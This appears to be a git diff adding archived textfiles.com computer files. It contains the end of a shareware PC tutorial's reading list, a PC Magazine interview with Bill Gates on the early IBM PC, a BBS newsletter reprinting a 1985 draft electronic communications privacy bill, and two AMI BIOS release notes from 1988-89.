and software + reviews, new ideas for making money with a computer in a home + office environment, using a modem, money management for the work + at home computerist, new business ideas, time management, + interesting franchise ideas, and more. 730 Broadway, NY, NY + 10003. 212/505-3580. + + LOTUS MAGAZINE (circulation office: PO Box 9123, Cambridge, MA, + 02139-9123, telephone (617) 494-1192) The ultimate spreadsheet + periodical. Back issues at some public libraries and many + university and college libraries are essential resources. The + spreadsheet is the ultimate number crunching engine as well as + an adequate database and even a poor man's word processor. Lotus + magazine shows you how to turbocharge your spreadsheet via + detailed and interesting examples. + + PC RESOURCE MAGAZINE. No longer published, but back issues in + library archives are ESSENTIAL reading for computer beginners + and novices. + + UNCLE HANKS SHAREWARE REVIEW Magazine is a Bi-Monthly collection + of reviews of some of the finest Shareware Programs available today. + A great little magazine discussing low cost quality shareware + programs for beginners and advanced computer users alike! For a + sample copy, send $1 to: Uncle Hank's Shareware, 8 Hendricks + Street, Easthampton, MA 01027. + + ---------------------------------------------------------------- + + RECOMMENDED READING - EQUIPMENT AND SOFTWARE CATALOGS + + ---------------------------------------------------------------- + + Below are listed several reputable software and hardware vendors + who provide interesting catalogs and reasonable service. This + does not suggest an endorsement, simply a resource with printed + catalogs which are of good educational value. + + Selective Software Catalog (903 Pacific Avenue, Santa Cruz CA + 95060) + + Power Up Software Catalog, POB 7600, San Mateo, CA 94403-7600. + 1-800-851-2917. + + US Micro Inc 1-800-874-5505 or (206) 453-4046 + + CompuAdd Computer 1-800-627-1967 or 1-800-666-1872 + + Dell Computer 1-800-283-1290 + + Austin Computer 1-800-752-1577 + + Swan Computer 1-800-468-9044 + + Northgate Computer 1-800-548-1993 + + Zeos Computer 1-800-423-5891 + + PC-Brand 1-800-PC BRAND + + ---------------------------------------------------------------- + + RECOMMENDED READING - SELECTED MAGAZINE ARTICLES + + ---------------------------------------------------------------- + + 55 Word Processors tested and evaluated, PC Magazine, February + 29, 1988 + + Programming Languages, Lawrence Tesler, Scientific American, + September 1984. + + Economy class accounting for small business. PC Magazine, April + 10, 1990. + + Advanced accounting packages evaluated and rated, PC Magazine, + September 15, 1987 + + Spreadsheet review, PC Magazine, April 24, 1988 + + Hard drive use and evaluations, PC Magazine, June 9, 1987 + + Best low end integrated packages including Microsoft Works, PC + Magazine, December 26, 1989 + + Printer evaluations and ratings, PC Magazine, November 10, 1987 + Also covered in PC Magazine issues: October 31, 1988 & November + 14, 1989 + + Basic programming language compilers, PC Magazine, October 31, + 1989 + + Best utilities, backup systems, fax review, PC Magazine, June + 23, 1987 + + Keyboards, mouse and other input devices, useful utilities, PC + Magazine, August 16, 1987 + + Project management programs, keyboard macro programs, 386 high + speed computers, disc diagnostic programs, PC Magazine, + September 29, 1987 + + Desktop publishing, spelling checkers PC Magazine, October 13, + 1987 + + Spreadsheet reviews, backup software evaluation, PC Magazine, + October 27, 1987. + + Hard drive cards - mail order drives, Low cost CAD packages, PC + Magazine December 8, 1987 + + The Excel spreadsheet from Microsoft, popup scratchpad/note- + takers PC Magazine, December 22, 1987 + + Best programs and hardware of 1989, PC Magazine, January 16, + 1990 + + Databases, expanded memory, graphics packages, 80386 computers, + Personal Computing, January, 1988 + + Portable computers, worms, PC Magazine, March 29, 1988 + + Database package evaluation, Desktop publishing software, PC + Magazine April 12, 1988 + + Top charting and graphing packages, Projection screen systems, + integrated word processors, PC Magazine March 15, 1988 + + Evaluation of OS/2, Running a small business with personal + finance software, Personal Computing, February 1988 + + High speed modems, Personal Computing, December 1987 + + Tutorial finished. Be sure to order your FOUR BONUS DISKS which + expand this software package with vital tools, updates and + additional tutorial material for laptop users! Send $20.00 to + Seattle Scientific Photography, Department LAP, PO Box 1506, + Mercer Island, WA 98040. Bonus disks shipped promptly! Some + portions of this software package use sections from the larger + PC-Learn tutorial system which you will also receive with your + order. Modifications, custom program versions, site and LAN + licenses of this package for business or corporate use are + possible, contact the author. This software is shareware - an + honor system which means TRY BEFORE YOU BUY. Press escape key to + return to menu. + + + diff --git a/textfiles.com/computers/bill b/textfiles.com/computers/bill new file mode 100644 index 00000000..77c3018e --- /dev/null +++ b/textfiles.com/computers/bill @@ -0,0 +1,171 @@ +Bill Gates Interview by (PC-Magazine) + +------------------------------------------------------------------------ +REMEMBERING THE BEGINNING +------------------------------------------------------------------------ + +PC MAGAZINE: + +15 years is a surprising amount of time in some ways. +Obviously the PC industry goes back further, but the IBM PC +changed it a lot. It changed the way people thought about +computers. + +BILL GATES : + +It absolutely did. For the IBM PC, the key market was a +hobbyist market. We'd gotten floppy disks, so we'd start to get into +some more serious applications. But, both the power of the machine, +because it was the first 16-bit machine, and the endorsement by IBM of +using a personal computer, and then the critical mass of software and +distribution and peripherals that came along with that, makes it the +biggest milestone in the history of personal computing. It was a sea change. +Of course, one of the big developments around it was that before the IBM-PC +came along, machines were essentially incompatible with each other. In those +first few years, [we saw] the whole notion of how compatible was compatible, +there were many different levels there. And a lot of hardware manufacturers +still felt they had more freedom to deviate a little bit and do things that +couldn't be virtualized by a common software interface. +So, in those first two years a lot of key things were established: the idea +of compatibility; MS-DOS as the primary system as opposed to CP/M-86 or UCSD +P-System which were the prime competitors; and the whole thing about a broad +software industry and using indirect distribution channels. Anyway, it was a +monumental change. + +PC MAGAZINE: + +Let's go back -- go back to that first 1982 PC Magazine +interview. You know, "The Man Behind the Machine." Microsoft was involved +with IBM to what at the time was an unprecedented degree. You had written +software for lots of other machines at that point, not operating systems but +BASICs and things like that. How different was it? + +BILL GATES : + +Well, for IBM it was extremely different because this was a +project where they let a supplier -- a partner, whatever you call us -- +shape the definition of the machine and provide fundamental elements of +the machine. When they first came to us, their concept was to do an 8-bit +computer. And the project was more notable because they were going to do +it so quickly and use an outside company. It wouldn't be a high-volume +product. Their charge was to do a home and a very low-end business machine. +They had the Data Master, which was 8085-based at the time, that they felt +was covering part of the business market. Then they had the 5100, the +machine that had both an APL and a BASIC interpreter, which was covering +another part of the business market. So it was sort of a home-down business +machine. And it was a very small team in Boca that wanted to prove that IBM +could do a product, any kind of product, in about an 18-month cycle. And +that was the most novel—that was going to be the novel thing was: could +you work with outsiders, which in this case was mostly ourselves but also +Intel, and do it quickly? +And the key engineer on the project, Lou Eggebrecht, was fast-moving. Once +we convinced IBM to go 16-bit (and we looked at 68000 which unfortunately +wasn't debugged at the time so decided to go 8086), he cranked out that +motherboard in about 40 days. It's one of the most phenomenal projects +because there were very small resources involved and we had to ROM the +BASIC which meant that it was essentially cast in concrete, so you couldn't +make much in the way of mistakes. We actually did this clever thing where for +disk versions of the system, we put enough hooks in the ROM that you could +place reasonably modular parts of the ROM. +So it was very lucky when it turned out about a year after the machine +shipped, there was a floating point bug and the New York Times ran it, we +could just issue a disk that patched out that part of the floating point +package because virtually all the machines that had been shipped were +disk-based,. What I had done was made the dispatch table hookable. It was +a very tricky project because the machine had to boot running only BASIC, +or if it detected a disk, it had to boot with the operating system. And +if only the BASIC came in, the we had to do file management against the +audiocassette. And they insisted that it run in a 48k configuration which +was pretty tricky; we were hoping they'd insist on 64k. Now, it turned +out most people bought 128k versions of the machine. + +PC MAGAZINE: + +Didn't the original machine come out with 16k? + +BILL GATES : + +The cheapest machine you could buy -- yeah you're right, +you're right: if you were cassette only, it was 16. And then if you +got the disk you could be 48. And, it was actually fairly complicated +because the ROM is up in very high memory, that is, it's at a different +segment address. The whole idea of where we use long addresses, where we +use short addresses. The 8086 architecture -- now that we have flat +memory model, people forget that a segmented memory model is a fairly +complex thing to work with. It actually got worse before it got better. +We went to the 286 which was very segment-oriented before we finally got +just straight, linear address space in 1986. + +PC MAGAZINE: + +And not in the operating system until after that. + +BILL GATES : + +That's right. + +PC MAGAZINE: + +That's significant. + +BILL GATES : + +Well, people had written applications to use real addresses -- +DOS applications depended on the fact that there was not a level of +indirection: that is that you simply shifted the segment value and added +it in. So we had to keep running Real Mode Applications—I mean today you +can buy an IBM PC and run a Real Mode Application. I mean it'd actually +be interesting to take those applications that shipped with the original +PC and plug them in. I'm pretty sure they'd work. I admit I haven't tried +it. The first applications were an adventure game from us, a typing tutor +from us, and then VisiCalc. + +PC MAGAZINE: + +Yes and Easy Writer. + +BILL GATES : + +Was Easy Writer there at the very beginning? I think it was. +So none of the early applications have successful follow-ons. Now the early +language tools included our BASIC compiler, our FORTRAN, and actually at +those times we offered a PASCAL and a COBOL compiler as well. + +PC MAGAZINE: + +Obviously, back then you were talking about DOS as the standard. +I mean you were telling people to write to MS-DOS, not to go around it to +the hardware and all that. Of course, the programs that became most +successful in those days of the applications, did go around it. IBM +became hardware-dependent, which of course was then copied a lot. Was +that a surprise to you? + +BILL GATES : + +No, not at all. I mean, remember we were the big promoters of +the bit-map graphics. We were really against this there were two video +cards. There was CGA, which we pushed for, unfortunately only got 640 by 200 +graphics into it and the palate was limited. It was just at the last minute +they gave us a tiny bit of a palate where color 0 could be mapped to 16, +and colors 1, 2 and 3 had a flip where they could be one set or another. +Anyway, the character cells on the CGA were 8 by 8 so they didn't look +as good as the Character Mode Only card. Because that was actually, +although it didn't have bit-map graphics, what IBM calls All Points +Address (APA) graphics. So it was actually 640 by 350 so the character +cells were much larger and looked a lot better. It was the Display +Writer character cell size. So IBM thought a lot of people would buy +that character mode card, which meant you couldn't do graphs and things. +But the only way to do graphics was to [write code directly to the hardware. +So all our applications that did graphics did that as well. It was only +later that we decided we could provide some high-level services and get +enough efficiency that graphics applications would go through the +operating system. +The definition of what it means to be a graphics application changed. +In the early days it meant you had a mode where a chart would come up. +Like when you ran Lotus 1-2-3, most of the time you were in character +mode, where the scrolling was very fast. Now at days we have processors +that are fast enough to scroll the bit map display and you don't even +think about it. Back then, just scrolling the display in graphics mode, +was noticeably, significantly, painfully slower than scrolling the +display in character mode because you have eight times as many bits +to push around and these processors were quite slow processors. diff --git a/textfiles.com/computers/bill1035.pro b/textfiles.com/computers/bill1035.pro new file mode 100644 index 00000000..89134588 --- /dev/null +++ b/textfiles.com/computers/bill1035.pro @@ -0,0 +1,349 @@ + +************************************************************* +* POSSIBLE FEDERAL LEGISLATION -- ELECTRONIC COMMUNICATIONS * +************************************************************* + +LETTER RECEIVED FROM UNITED STATES SENATE -- FEEDBACK NEEDED + + System Operators (SYSOPS) of Bulletin Board Systems (BBS) and electronic mail +systems everywhere are concerned about possible legislation, at both a Federal +and State level, pertaining to the uses of the wonderful new technologys of +telecommunications, BBS's and messaging. Some of the legislation is of grave +concern, such as the bill introduced by Senator Paul Trible. We do not take +issue with the concerns that motivated Senator Trible that suggest the need for +such legislation, but we do take issue with some of the wording of that +particular bill. Comments on Senator Trible's bill are found elsewhere in the +LAW MUG Newsletter. + + UNITED STATES SENATE + COMMITTEE ON THE JUDICIARY + WASHINGTON, DC 20510 + + STROM THURMOND, SOUTH CAROLINA, CHAIRMAN +CHARLES McC MATHIAS, Jr., MARYLAND JOSEPH R. BIDEN, Jr., DELAWARE +PAUL LAXALT, NEVADA EDWARD M. KENNEDY, +MASSACHUSETTS +ORRIN G. HATCH, UTAH ROBERT C. BYRD, WEST VIRGINIA +ALAN K. SIMPSON, WYOMING HOWARD M. METZENBAUM, OHIO +JOHN EAST, NORTH CAROLINA DENNIS DeCONCINI, ARIZONA +CHARLES E. GRASSLEY, IOWA PATRICK J. LEAHY, VERMONT +JEREMIAH DENTON, ALABAMA HOWELL HEFLIN, ALABAMA +ARLEN SPECTER, PENNSYLVANIA PAUL SIMON, ILLINOIS +MITCH McCONNELL, KENTUCKY + + DENNIS W. SHEDD, CHIEF COUNSEL AND STAFF DIRECTOR + DEBORAH K. OWEN, GENERAL COUNSEL + DEBORAH G. BERNSTEIN, CHIEF CLERK + MARK N. GITENSTEIN, MINORITY CHIEF COUNSEL + + August 16, 1985 +THE TEXT OF THE DISCUSSION DRAFT + + [Discussion Draft] + [10-16-85] +99th CONGRESS +1ST SESSION + H.R.____ + + IN THE HOUSE OF REPRESENTATIVES + +Mr.___________________ introduced the following bill; which was referred to +Committee on______________________ + + A BILL + +To amend title 18, United States Code, with respect to the interception +of +certain communications, other forms of surveillance, and for other +purposes. + + 1 Be it enacted by the Senate and House of Representatives + 2 of the United States of American in Congress assembled, +----------------------- (Beginning of Page 2) + 1 SECTION 1. SHORT TITLE. + 2 This Act may be cited as the "Communications Privacy + 3 Act of 1985". + 4 TITLE I--TITLE 18 AND RELATED MATTERS + 5 SEC.101. FEDERAL PENALTIES FOR THE INTERCEPTION OF + 6 ELECTRONIC COMMUNICATIONS + 7 (a) DEFINITION OF "ELECTRONIC COMMUNICATION".--(1) + 8 Section 2510 of title 18, United States Code, is amended by + 9 striking out paragraph (1) and inserting in lieu thereof the +10 following: + + "(1) 'electronic communication' means any + transmission-----------of signs, signals, + writing, images, sounds, data or intelligence of any + nature by wire, radio, optical or other electromagnetic + systems affecting interstate commerce;". + +19 (2) Section 2510(4) of title 18 of the United States Code +20 is amended by striking out "aural". +21 (b) EXCEPTIONS WITH RESPECT TO ELECTRONIC +22 COMMUNICATIONS.--Section 2511(2) of title 18, United States +23 Code, is amended by adding at the end thereof the following +24 new paragraph: +25 "(g) It shall not be unlawful under this chapter for any +----------------------- (Beginning of Page 3) + 1 person.. + 2 "(1) to intercept an electronic communication made + 3 through an electronic communication system designed so + 4 that such electronic communication is readily accessible + 5 to the public. + 6 "(ii) to intercept any electronic communication + 7 which is transmitted.. + 8 "(I) by any station for the use of the general + 9 public, which relates to ships, aircraft, vehicles, +10 or persons in distress; +11 "(II) by a walkie talkie, or a police or fire +12 communication system readily accessible to the +13 public; or +14 "(III) by an amateur radio station operator or +15 by a citizens band radio operator; or +16 "(iii) to engage in any conduct which.. +17 "(I) is prohibited by section 633; or +18 "(II) is excepted from the application of +19 section 705(a) of the Communication Act of 1934 by +20 section 705(b) of that Act." +21 (c) TECHNICAL AND CONFORMING AMENDMENTS.--(1) Chapter 119 +22 of title 18, United States Code, is amended by striking out +23 "wire" each place it appears (including in any section +24 heading) and inserting "electronic" in lieu thereof. +25 (2) The heading of chapter 119 of title 18, United States +----------------------- (Beginning of Page 4) + 1 Code, is amended by inserting "AND OTHER ELECTRONIC" after + 2 "WIRE". + 3 (3) The item relating to chapter 119 in the table of + 4 chapters at the beginning of Part I of title 18 of the United + 5 States Code is amended by inserting "and other electronic" + 6 after "wire". + 7 SEC. 102. ADDITIONAL PROHIBITIONS RELATING TO ELECTRONIC + 8 COMMUNICATIONS AND MODIFICATION OF CERTAIN + 9 EXCEPTIONS. + (a) ADDITIONAL PROHIBITIONS.--Sections 2511 of title 18, + United States Code, is amended by adding at the end of + the following: + "(3) Unless authorized by the service provider, the + service user, or as otherwise specifically authorized by + this chapter, whoever willfully accesses an electronic + communication system or willfully exceeds an authorization + to access an electronic communication system and obtains or + alters an electronic communication while it is stored in + such system shall + + "(A) if the offense is committed for purposes of commercial + advantage, malicious destruction or damage, or private + commercial gain shall.. +20 "(i) be fined not more than $250,000 or +21 imprisoned not more than one year, or both, in the +22 case of a first offense under this [subparagraph]; +23 and +24 "(ii) be fined not more than $250,000 or +25 imprisoned not more than two years, or both, for any +----------------------- (Beginning of Page 5) + 1 subsequent offense under this [subparagraph]; and + 2 "(B) be fined not more than $5,000 or imprisoned + 3 not more than six months, or both, in any other + 4 case." + + (b) Chapter 119 of title 18, United States Code, is + amended by adding a new section following section 2511; + "Sec 2511a. Protection of privacy for users of an electronic + communication service. + + "(a)(1) Except as authorized by this chapter, [or FISA] + or by specific consent of the user originating an electronic + communication, no person or entity providing an electronic +communication + service may knowingly divulge [or publish] the contents of such + communication to any person other than the addressee, his + agent, or attorney, except to.. + "(A) any person to whom such disclosure is authorized + by the addressee, his agent, or attorney; + "(B) any person employed or authorized to forward such + communication to its destination; or + "(C) any person who needs such communication to render + or conduct a business activity related to an electronic + communication service or other service provided by the + provider to the user. + "(2) Nothing in the provisions of paragraph (1) shall + be construed to prohibit an addressee, his agent, or attorney + from divulging or publishing the contents of such a communication. + +THE DRAFT LEGISLATION, CONTINUED + +----------------------- (Beginning of Page 6) + SEC. 103. RECOVERY OF CIVIL DAMAGES. + 1 Section 2520 of title 18, United States Code, is amended + 2 to read as follows: + 3 "Sec 2520. Recovery of civil damages authorized + 4 "(a) Any person whose electronic communication or oral + 5 communication is intercepted, accessed, disclosed, or used in + 6 violation of this chapter may in a civil action recover from + 7 the person or entity which engaged in that violation such + 8 relief as may be appropriate. + 9 "(b) In an action under this section, appropriate relief +10 includes.. +11 "(1) such preliminary and other equitable [or +12 declaratory] relief as may be appropriate; +13 "(2) damages under subsection (c); and +14 "(3) [a reasonable attorney's fee and other +15 litigation costs reasonably incurred]. +16 "(c) Damages in an action under this section shall be +17 [whichever is the greater of].. +18 "(1) the sum of the actual damages suffered by the +19 plaintiff and any profits made by the violator as a +20 result of the violation; or + +21 "(2) statutory damages in an amount not less than +22 $500 or more than $10,000. +23 "(d) A good faith reliance on a court warrant or order +24 is a complete defense against a civil action under this +25 section. +----------------------- (Beginning of Page 7) + 1 "?e) A civil action under this section may not be + 2 commenced later than two years after the occurrence of the + 3 violation [or after the claimant has had a reasonable + 4 opportunity to discover the violation, whichever is + 5 later].]". + 3 SEC. 104. CERTAIN APPROVALS BY ACTING ASSISTANT ATTORNEY + 4 GENERAL. + 5 Section 2516(1) of title 18 of the United States Code is + 6 amended by inserting "(or acting Assistant Attorney + 7 General)" after "Assistant Attorney General". + 8 SEC 105. ADDITION OF OFFENSES TO CRIMES FOR WHICH + 9 INTERCEPTION IS AUTHORIZED +10 Section 2516(1)(c) of title 18 of the United States Code +11 is amended.. +12 (1) by striking out "2314" and inserting "2312, +13 2313, 2314," in lieu thereof; +14 (2) by inserting "the second section 2320 (relating +15 to trafficking in certain motor vehicles or motor vehicle +16 parts), section 1203 (relating to hostage taking), +17 section 1029 (relating to fraud and related activity in +18 connection with access devices), section 32 (relating to +19 destruction of aircraft or aircraft facilities)," after +20 "stolen property),"; and +21 (3) by inserting "section 1952A (relating to use of +22 interstate commerce facilities in the commission of +23 murder for hire), section 1952B (relating to violent +24 crimes in aid of racketeering activity)," after "1952 +25 (interstate and foreign travel or transportation in aid +----------------------- (Beginning of Page 8) + 1 of racketeering enterprises)," + 2 SEC. 106. ADDITIONAL REQUIREMENTS FOR APPLICATIONS, ORDERS, + 3 AND IMPLEMENTATION OF ORDERS. + 4 (a) INVESTIGATION OBJECTIVES.--Section 2518(1)(b) of + 5 title 18 of the United States Code is amended by inserting + 6 immediately before the semicolon at the end the following: + 7 ", and (v) the specific investigative objectives and the + 8 specific targets, if known, of the interception to which the + 9 application pertains". +10 (b) ALTERNATE INVESTIGATIVE TECHNIQUES.--Section +11 2518(1)(c) of title 18 of the United State Code is amended +12 by inserting "(including the use of consensual monitoring, +13 pen registers, tracers, contempt proceedings, perjury +14 prosecutions, use of accomplice testimony, grand jury +15 subpoena of documents, search warrants, interviewing +16 witnesses, and obtaining documents through other legal +17 means)" after "procedures". +18 (c) PLACE OF AUTHORIZED INTERCEPTION.--Section 2518(3) of +19 title 18 of the United States Code is amended by inserting +20 "(and outside that jurisdiction but within the United States +21 in the case of a mobile interception device installed within +22 such jurisdiction)" after "within the territorial +23 jurisdiction of the court in which the judge is sitting". +24 (d) PHYSICAL ENTRY.--Section 2518(4) of title 18 of the +25 United States Code is amended by adding at the end "An order + +----------------------- (Beginning of Page 9) + 1 authorizing the interception of an electronic communication + 2 under this chapter may, upon a showing by the applicant that + 3 there are no other less intrusive means reasonably available + 4 of effecting the interception, authorize physical entry to + 5 install an electronic, mechanical, or other device.". + 6 (e) PERIODIC REPORTS.--Subsection (6) of section 2518 of + 7 title 18 of the United States Code is amended to read as + 8 follows: + 9 "(6) An order authorizing interception pursuant to this +10 chapter shall require that reports be made not less often +11 than every ten days to the judge who issued such order, +12 showing what progress has been made toward achievement of the +13 authorized objective, the need, if any for continued +14 interception, and whether any evidence has been discovered +15 through such interception of offenses other than those with +16 respect to which such order was issued. The judge may suspend +17 or terminate interception if any such report is deficient, +18 evinces serious procedural irregularities, or indicates the +19 legal basis of continued interception no longer exists." +20 (f) TIME LIMIT FOR THE MAKING AVAILABLE TO JUDGE OF +21 RECORDINGS.--Section 2518(8)(a) of title 18 of the United +22 States Code is amended by striking out "Immediately upon" +23 and inserting "Not later than 48 hours after" in lieu +24 thereof. +----------------------- (Beginning of Page 10) + 6 SEC. 107. REPORTING REQUIREMENT. + 7 Section 108(b) of the Foreign Intelligence Surveillance + 8 Act of 1978 (50 U.S.C. 1808(b)) is amended by striking out + 9 "On" and all that follows through "four years thereafter" +10 and inserting in lieu thereof "On or before October 25 of +11 each year". +12 SEC. 108. EFFECTIVE DATE. +13 This title and the amendments made by this title shall +14 take effect 90 days after the date of the enactment of this +15 Act and shall, in the case of conduct pursuant to a court +16 order or extension, apply only with respect to court orders +17 or extensions made after this title takes effect." + +PARTIAL EXPLANATION OF THIS POSSIBLE LEGISLATION, AS DRAFTED TO DATE + +The draft attempts to insert reforms into the existing structure of +Title III in the following ways: + + * Provides a new definition of "electronic communication." + * Provides criminal penalties for unauthorized access to obtain + or transform an electronic communication stored in an electronic + communications system. + * Provides for restrictions on the disclosure of the contents + of an electronic communication by the service providers + under specified circumstances. + * Provides civil penalties for violations of the provisions of + the Act. + +In a MEMORANDUM from Mr. Podesta dated August 16, 1985 he stated, in +part: + + "What is missing from this draft is a section regulating + the circumstances and standards under which the government + may obtain the contents of an electronic communication, + records generated about a service user by a service provider, + and records generated through the use of a pen register or + tracer. We still are working on weaving those provisions + into the current structure of Title III, specifically in 18 + U.S.C. Sec. 2518. From a policy point of view, we continue to + believe that the best approach is to require a probable cause + warrant to acquire the contents of a communication, similar to + that required in Sub Sec. 2518. We believe that a court order + based on reasonable suspicion is a more appropriate mechanism for + giving government access to records generated by a service + provider about a user as well as for the installation of a + pen register or tracer." + +EDITOR'S COMMENT + + As one can see, this legislation is designed to protect legitimate users of +telecommunications and BBS technology. As we have requested in prior reports on +troubling legislation that all interested parties write to the Congressmen and +Senators and those involved with sponsoring legislation, we again ask that you +write, but this time in support of the legislation herein reported on. +Electronic (digital) systems need the same protection afforded to voice (analog) +telephone communication and the protection afforded to letters sent via the +United States Post Office. + +We'll have more to report in future newsletters. + +--------------------------------------- +[][][][][][][][][][][][][][][][][][][] + The Fifth Precinct..[502] 245-8270 +[][][][][][][][][][][][][][][][][][][] + \ No newline at end of file diff --git a/textfiles.com/computers/bios1215.man b/textfiles.com/computers/bios1215.man new file mode 100644 index 00000000..9431c981 --- /dev/null +++ b/textfiles.com/computers/bios1215.man @@ -0,0 +1,116 @@ + +AMI 286 and 386 BIOS +new release +Release notes + +Release date : 12/15/1988 + +This release of AMI 286 and 386 BIOS will have the following new features +and corrections over the previous release which was 09/25/1988. + +new features + +Options to bypass Keyboard/Video/floppy errors for Dedicated file servers +or similar applications... + +This release of AMI BIOS can be configured to do one of the following:- + + - Bypass testing Keyboard and/or Video and/or Floppy controller + during Power on self test. + + - Test all during Power on self test but in case of Keyboard and/or + Video and/or Floppy controller errors do not wait for user to press + the "F1" key. + +To configure the BIOS as above at your facility, you need the new AMIGEN +program. You can buy the AMIGEN program from AMI if you do not have +one. If you already have an AMIGEN program you can get the updated +AMIGEN program and new release of the BIOS by paying nominal charges. +Please refer to the price list for BIOS update for details. + +Support for additional serial ports... + +AMI BIOS will now look for additional on board or off board serial ports +upto a maximum 4 ports. These serial ports will be assigned port numbers +3F8,2F8,3E8,2E8 as COM1, COM2, CMO3, COM4 respectively. However, the +BIOS support for COM3, COM4 is limited to integrating them into the +system. The BIOS will support data transfer and programmability for COM1 +and COM2 only. + +Boot up screen... + +We have added a boot up screen for all types of BIOS with diagnostics +program or extended setup program. This screen will contain data pertaining +to system configuration. The boot up screen will look like the one in +Appendix-A. + + +Changes related to both C&T 386 chipset and NEAT Chipset + +Additional memory configuration... + +In this release of C&T 386 and NEAT BIOS from AMI, you can have the +following physical memory configuration which was not available in the +earlier relases:- + + Bank 0,1 256KB chips Bank 2,3 1Meg chips + +BIOS will automatically assign physical bank 2,3 as logical bank 0,1 and +make all the memory available to you. + +Changes in POST... + +In C&T 386 and NEAT BIOS the POST will always be performed with a +memory wait state of 1 and it will be changed according to the EXTENDED +CMOS settings before system boot. + +Clock Switching... + +The clock switching techniques for C&T 386 and NEAT is made more +general. Now the AMI BIOS will support the following:- + + - Clock switching Using Keyboard controller pin + - Clock switching programming processor clock speed + - Clock switching programming processor clock and bus clock speed + +In last two cases the keyboard controller pin can also be used to bring the +turbo led on or off. + + +Changes related to AMI NEAT BIOS only + +386 SX support in the AMI NEAT BIOS... + +AMI NEAT BIOS will now support 386 SX processor and the associated 387 +SX co-processor. Contact AMI for an evaluation copy of this BIOS. + + + + + +AMI BIOS +Future release + +AMI, well known for its innovative ideas in making AMI BIOS more and +more user friendly, will add the following new features in the AMI BIOS. +The BIOS with these new features will be available in March 1989. + +Midified CMOS SETUP Program + +Options to bypass Keyboard/Video/Floppy errors for Dedicated file servers +and similar applications... + +The AMI BIOS will now have the option to configure the BIOS to bypass +Keyboard and/or Video and/or Floppy tests through the CMOS SETUP +program. This option is at present available through the AMIGEN program. + +User defined drive type... + +The AMI BIOS supports 46 predefined drive parameters. There will be +occasions when you have a drive which does not match with any one of +these 46 drive types. In these cases, you can use this new feature in AMI +BIOS by which you can specify drive parameters through the CMOS SETUP +program. These parameters will be stored in the CMOS. The type of drive +will be type 47 which will be referred to as "USER DEFINED DRIVE +TYPE". + \ No newline at end of file diff --git a/textfiles.com/computers/bios225.man b/textfiles.com/computers/bios225.man new file mode 100644 index 00000000..d58a112f --- /dev/null +++ b/textfiles.com/computers/bios225.man @@ -0,0 +1,172 @@ + +AMI 286 and 386 BIOS +new release +Release notes + +Release date : 02/25/1989 + +This release of AMI 286 and 386 BIOS will have the following new features +and corrections over the previous release which was 12/15/1988. + +new features + +82C302-C chip support + +This release of AMI BIOS for will support 82C302-C chip which uses 4KB +page size instead of 2KB page size supported by 82C302. This same copy of +BIOS will support both the chips as the BIOS will automatically find out +the type of chip used. + +Changes related to both C&T 386 chipset and NEAT Chipset + +Chipset register program bypass at soft reset... + +Previous releases of the AMI BIOS programed the C&T 386 and NEAT +Chipset register either with BIOS default values or values set by user in +the Extended CMOS in cold boot as well as soft reset. This version will +bypass the Chipset programming in soft reset so that if the user runs any +program to alter the chipset registers, it will remain unchanged till the +machine is switched off. + + +Compatibility issues resolved + +Western Digital WD1003V-MM2 controller and Miniscribe drives... + +The problems AMI BIOS had with the above combination of hard disk +controller and hard drives have been solved. + +Problems in using hard drives with more than 1024 cylinders... + +All the previous releases of AMI BIOS supported more than 1024 cylinders +directly through the BIOS. However the support in AMI BIOS was such +that, the BIOS always use to return actual # of cylinders with the return +disk parameter function call (function 8, interrupt 13h). This caused problem +with DOS in using hard drives with more than 1024 cylinders because DOS +can not handle more than 1024 cylinders. Also programs like Speedstore did +not expect the BIOS to return more than 1024 cylinders with this function +call. +This release of AMI BIOS is modified to return maximum 1024 as # of +cylinders in response to the return drive parameter function call(function 8, +interrupt 13h). This will take care of the problem with DOS, Speedstore +while using a drive more than 1024 cylinders. + + +AMI BIOS +Future release + +AMI, well known for its innovative ideas in making AMI BIOS more and +more user friendly, will add the following new features in the AMI BIOS. +The BIOS with these new features will be available in 3rd/4th week of +March 1989. + +Modified CMOS SETUP Program + +Options to bypass Keyboard/Video/Floppy errors for Dedicated file servers +and similar applications... + +The AMI BIOS will now have the option to configure the BIOS to bypass +Keyboard and/or Video and/or Floppy tests through the CMOS SETUP +program. This option is at present available through the AMIGEN program. + +User defined drive type... + +The AMI BIOS supports 46 predefined drive parameters. There will be +occasions when you have a drive which does not match with any one of +these 46 drive types. In these cases, you can use this new feature in AMI +BIOS by which you can specify drive parameters through the CMOS SETUP +program. These parameters will be stored in the CMOS. The type of drive +will be type 47 which will be referred to as "USER DEFINED DRIVE +TYPE". + + + + +Features in last release(12/15/88) + +of AMI BIOS + + +Options to bypass Keyboard/Video/floppy errors for Dedicated file servers +or similar applications... + +This release of AMI BIOS can be configured to do one of the following:- + + - Bypass testing Keyboard and/or Video and/or Floppy controller + during Power on self test. + + - Test all during Power on self test but in case of Keyboard and/or + Video and/or Floppy controller errors do not wait for user to press + the "F1" key. + +To configure the BIOS as above at your facility, you need the new AMIGEN +program. You can buy the AMIGEN program from AMI if you do not have +one. If you already have an AMIGEN program you can get the updated +AMIGEN program and new release of the BIOS by paying nominal charges. +Please refer to the price list for BIOS update for details. + +Support for additional serial ports... + +AMI BIOS will now look for additional on board or off board serial ports +upto a maximum 4 ports. These serial ports will be assigned port numbers +3F8,2F8,3E8,2E8 as COM1, COM2, CMO3, COM4 respectively. However, the +BIOS support for COM3, COM4 is limited to integrating them into the +system. The BIOS will support data transfer and programmability for COM1 +and COM2 only. + +Boot up screen... + +We have added a boot up screen for all types of BIOS with diagnostics +program or extended setup program. This screen will contain data pertaining +to system configuration. + + +Changes related to both C&T 386 chipset and NEAT Chipset + +Additional memory configuration... + +In this release of C&T 386 and NEAT BIOS from AMI, you can have the +following physical memory configuration which was not available in the +earlier relases:- + + Bank 0,1 256KB chips Bank 2,3 1Meg chips + +BIOS will automatically assign physical bank 2,3 as logical bank 0,1 and +make all the memory available to you. + +Changes in POST... + +In C&T 386 and NEAT BIOS the POST will always be performed with a +memory wait state of 1 and it will be changed according to the EXTENDED +CMOS settings before system boot. + +Clock Switching... + +The clock switching techniques for C&T 386 and NEAT is made more +general. Now the AMI BIOS will support the following:- + + - Clock switching Using Keyboard controller pin + - Clock switching programming processor clock speed + - Clock switching programming processor clock and bus clock speed + +In last two cases the keyboard controller pin can also be used to bring the +turbo led on or off. + + +Changes related to AMI NEAT BIOS only + +386 SX support in the AMI NEAT BIOS... + +AMI NEAT BIOS will now support 386 SX processor and the associated 387 +SX co-processor. Contact AMI for an evaluation copy of this BIOS. + 